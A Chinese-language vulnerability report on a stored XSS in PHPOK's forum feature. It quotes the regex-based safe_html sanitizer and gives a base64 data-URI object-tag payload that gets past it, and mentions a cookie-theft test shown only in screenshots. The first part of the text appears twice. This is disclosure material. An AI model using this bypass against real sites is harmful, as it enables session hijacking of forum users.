### 简要描述: phpok(论坛BBS功能) 存储型xss ### 详细说明: public function safe_html($content,$clear_url='') { $content = preg_replace_callback('/<(.+)>/isU',array($this,'_clean_xss_on'),$content); //清除带src和href里的信息 $content = preg_replace_callback("/<(.*)(src|href)\s*=(\"|')(.+)(\\3)(.*)>/isU",array($this,'_clean_xss_script'),$content); //清除src传递没有引号的数据 $content = preg_replace_callback("/<(.*)(src|href)\s*=([^\s>]+)([\s|\/|>])/isU",array($this,'_clean_xss_script2'),$content); //清除script,applet,style,title,iframe等不安全信息 $content = preg_replace("/<(^[script|applet|style|title|iframe|frame|frameset|link]+).*>[.\n\t\r]*<\/\\1>/isU",'',$content); $content = preg_replace("/<\/?link.*?>/isU","",$content); //清除meta信息 $content = preg_replace('/<meta(.+)>/isU','',$content); ......... return $content; } 绕过测试: ``` <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="> ``` [<img src="https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png"...
### 简要描述: phpok(论坛BBS功能) 存储型xss ### 详细说明: public function safe_html($content,$clear_url='') { $content = preg_replace_callback('/<(.+)>/isU',array($this,'_clean_xss_on'),$content); //清除带src和href里的信息 $content = preg_replace_callback("/<(.*)(src|href)\s*=(\"|')(.+)(\\3)(.*)>/isU",array($this,'_clean_xss_script'),$content); //清除src传递没有引号的数据 $content = preg_replace_callback("/<(.*)(src|href)\s*=([^\s>]+)([\s|\/|>])/isU",array($this,'_clean_xss_script2'),$content); //清除script,applet,style,title,iframe等不安全信息 $content = preg_replace("/<(^[script|applet|style|title|iframe|frame|frameset|link]+).*>[.\n\t\r]*<\/\\1>/isU",'',$content); $content = preg_replace("/<\/?link.*?>/isU","",$content); //清除meta信息 $content = preg_replace('/<meta(.+)>/isU','',$content); ......... return $content; } 绕过测试: ``` <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="> ``` [<img src="https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png" alt="QQ截图20150414182421.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png) COOkie获取测试: [<img src="https://images.seebug.org/upload/201504/14182738f24a403a6a82c5006b9fcc1416e72915.png" alt="QQ截图20150414182719.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/14182738f24a403a6a82c5006b9fcc1416e72915.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png" alt="QQ截图20150414182421.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png)
